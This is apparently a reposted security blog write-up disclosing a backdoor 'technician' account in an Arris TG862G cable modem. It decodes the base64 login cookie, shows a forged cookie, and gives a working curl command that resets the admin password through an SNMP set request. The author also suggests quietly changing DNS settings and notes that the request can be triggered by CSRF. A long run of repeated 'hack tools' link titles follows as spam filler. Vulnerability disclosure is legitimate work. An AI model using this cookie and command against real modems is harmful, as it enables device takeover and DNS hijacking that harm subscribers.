Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW
After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}And finally:
{"credential":"technician:"}Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(
That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.
Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:
That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:
Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OKWhat about setting a new value? Surely that will not work....
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:
This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.
The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this
Related links
- Pentest Tools Port Scanner
- Hack Tools For Pc
- Pentest Tools Nmap
- Kik Hack Tools
- Hacker Search Tools
- Hacking Tools Kit
- Hack Tools For Pc
- Pentest Tools Bluekeep
- Hack Tools Mac
- Wifi Hacker Tools For Windows
- Hacker Techniques Tools And Incident Handling
- Pentest Recon Tools
- Pentest Tools For Android
- How To Make Hacking Tools
- Hacking Tools And Software
- Top Pentest Tools
- Hack Tools Download
- Hacking Tools For Kali Linux
- Physical Pentest Tools
- Game Hacking
- Hak5 Tools
- Growth Hacker Tools
- Pentest Tools Android
- Pentest Tools List
- Hack Tools Pc
- Pentest Tools Tcp Port Scanner
- Hacker Tools List
- Black Hat Hacker Tools
- Hack Tools Mac
- Bluetooth Hacking Tools Kali
- Hacking Tools Mac
- Nsa Hack Tools Download
- Pentest Tools Tcp Port Scanner
- Hack Tools For Mac
- Usb Pentest Tools
- Hacker Tools Linux
- Pentest Tools Android
- Hacking Apps
- Hack Tools For Ubuntu
- Hackrf Tools
- Hacking Tools Download
- Hacking Tools Hardware
- Nsa Hack Tools Download
- How To Hack
- Hacking Tools For Windows
- Pentest Tools Online
- Hacking Tools Online
- New Hacker Tools
- Hacker Tools Free Download
- Hack And Tools
- Hacker Tools Software
- Hacker Tools For Mac
- Hacker Tools For Pc
- Bluetooth Hacking Tools Kali
- How To Hack
- Hacker Hardware Tools
- New Hacker Tools
- Android Hack Tools Github
- Computer Hacker
- Pentest Tools Android
- Hacker Tools List
- Pentest Tools Nmap
- Hacking Tools For Kali Linux
- Tools For Hacker
- Hacking Tools Github
- Hacking Tools Pc
- Hack Tools Github
- Hack Tools Pc
- Hacker Tools Free Download
- Computer Hacker
- Hacking Tools Hardware
- Hack Tool Apk No Root
- Pentest Tools Github
- Hacker Hardware Tools
- Hacking App
- Hacker Tools For Pc
- Pentest Tools Url Fuzzer
- Hacking Tools Usb
- Hack Rom Tools
- Pentest Recon Tools
- Underground Hacker Sites
- Hacker Tools Online
- Pentest Tools
- How To Hack
- Hacking Tools For Mac
- Pentest Box Tools Download
- Hacks And Tools
- Hacking Tools 2020
- Game Hacking
- Wifi Hacker Tools For Windows
- Pentest Tools Tcp Port Scanner
- Easy Hack Tools
- Hack Tools Download
- Pentest Tools Android
- Usb Pentest Tools
- Termux Hacking Tools 2019
- Hacker
- Hacker Tools Free Download
- Hack Tools Github
- Hacker Tools Online
- How To Make Hacking Tools
- Pentest Tools Download
- Pentest Tools
- Hacker Techniques Tools And Incident Handling
- Hacker Hardware Tools
- Hackers Toolbox
- Pentest Tools Subdomain
- Pentest Tools Online
- Wifi Hacker Tools For Windows
- Hacking Tools Kit
- Tools 4 Hack
- Github Hacking Tools
- Hack And Tools
- Hack Tools For Games
- Hacker Tools 2019
- Pentest Tools For Mac
- Hacker Tools Apk Download
- Game Hacking
- Hacking Tools For Kali Linux
- Hack Tools Mac
- Hak5 Tools
- Hack Tools For Pc
- Hacker Tools For Windows
- Best Pentesting Tools 2018
- Pentest Tools For Mac
- Computer Hacker
- New Hack Tools
- Hacks And Tools
- Pentest Reporting Tools
- World No 1 Hacker Software
- How To Make Hacking Tools
- Install Pentest Tools Ubuntu
- Free Pentest Tools For Windows
- Hacking Apps
- Growth Hacker Tools
- Hacking Tools Name
- Hacker Tools Hardware
- How To Make Hacking Tools
- Pentest Tools Kali Linux
- Hacking Tools Software
- Hacker Hardware Tools
- Hack Tools For Pc
- Hack Tool Apk
- Hacker Tools Github
- Hacking Tools Software
- Pentest Tools Review
- Blackhat Hacker Tools
- Hack Website Online Tool
- Pentest Tools Open Source
- Best Hacking Tools 2019
- Hackers Toolbox
- Pentest Recon Tools
- Hack Tools Online
- Top Pentest Tools
- Pentest Tools Windows
- Kik Hack Tools
- Android Hack Tools Github
- Blackhat Hacker Tools
- Pentest Tools Open Source
- Pentest Tools Free
- Game Hacking
- Hacking Tools Download
- Hacker Tools Github
- New Hacker Tools